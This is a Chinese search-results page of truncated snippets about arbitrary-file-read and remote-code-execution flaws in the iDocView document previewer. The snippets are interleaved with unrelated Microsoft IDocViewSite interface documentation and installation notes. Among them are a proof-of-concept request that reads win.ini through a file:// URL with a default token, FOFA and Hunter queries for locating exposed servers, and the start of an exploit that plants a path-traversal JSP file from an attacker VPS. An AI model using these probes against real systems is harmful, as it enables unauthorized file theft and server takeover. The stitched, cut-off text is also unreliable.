idocview任意文件读取,可通过相关接口读取任意文件 网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。 任意文件读取会造成(敏感)信息泄露,与任意文件下载本质上没有区别,信息都是从服务端流向浏览...
IDocViewSite 接口 概述 IDocViewSite::OnSetTitle 方法 IFileViewerA 接口 IFileViewerSite 接口 IFileViewerW 接口 INewShortcutHookA 接口 INewShortcutHookW 接口 IShellFolderBand 接口 IShellImageStore 接口 IThumbnailCapture 接口 PathIsSlowA 函数
Used as a site object by theIShellViewinterface. Inheritance TheIDocViewSiteinterface inherits from theIUnknowninterface.IDocViewSitealso has these types of members: Methods TheIDocViewSiteinterface has these methods. IDocViewSite::OnSetTitle
IDocView_qJvqhFt接口任意文件读取 fofa title="I Doc View" poc GET /view/qJvqhFt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko)...
IDocViewSite::OnSetTitle 方法 (shlobj.h) 發行項 2024/03/14 意見反應 本文內容 語法 參數 傳回值 規格需求 設定或擷取網站對象的標題。 語法 C++ 複製 HRESULT OnSetTitle( [in] VARIANTARG *pvTitle ); 參數 [in] pvTitle 類型: VARIANTARG* 指定檢視標題。 傳回值 類型: HRESULT 如果...
iDocView是一个在线文档预览系统 /doc/upload 接口处存在任意文件读取漏洞,未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息,使系统处于极度不安全的状态。 ## 资产测绘 ``` Hunter语法: app.name="I Doc View" Fofa语法: title="I Doc View" ``` ## poc ``` http://xxxxxx/doc/...
发现主机上安装的 iDocView,并通过 POC 验证 是否存在漏洞。 简单使用 运行idocv_rce_ct_827723_scanner_windows_amd64.exe scan 输出是否存在漏洞:是或者VulnFound: true则说明存在漏洞。 将检测数据输出到 json 文件 运行idocv_rce_ct_827723_scanner_windows_amd64.exe scan --output result.json ...
IDocView修改问题 1修改端口号 1)1启动脚本 Start.bat文件“set port=80” 80为默认,可自定义 2)2 停止脚本 Stop.bat文件“set port=80” 80为默认,与start.bat保持一致 3)3 Apache配置文件 Apache/conf/httpd.conf文件“Listen 80” 80为默认,与start.bat保持一致 4)4 Apache vhost文件 Apache/conf/...
系统环境:Windows Server 2012 64位或以上版本(最低2008 R2 64位,不推荐)硬件环境:线上稳定运行内存8G或以上(测试环境无此要求)。如果预览文档量较大,推荐配置SSD硬盘,以提高预览速度。 08*必填 产品类型(正式购买时可调整) 标准版(预览word,excel,ppt) ...
iDocView < 13.10.1_20231115 复现过程 1.在vps上创建jsp文件 文件名:..\..\..\docview\1.jsp创建时候注意方法一: vim ..\\..\\..\\docview\\1.jsp方法二: touch '..\..\..\docview\1.jsp' ls-al 查看是否创建成功 2.在vps上创建html文件 创建任意名字html文件 <!DOCTYPE htm1>runoob....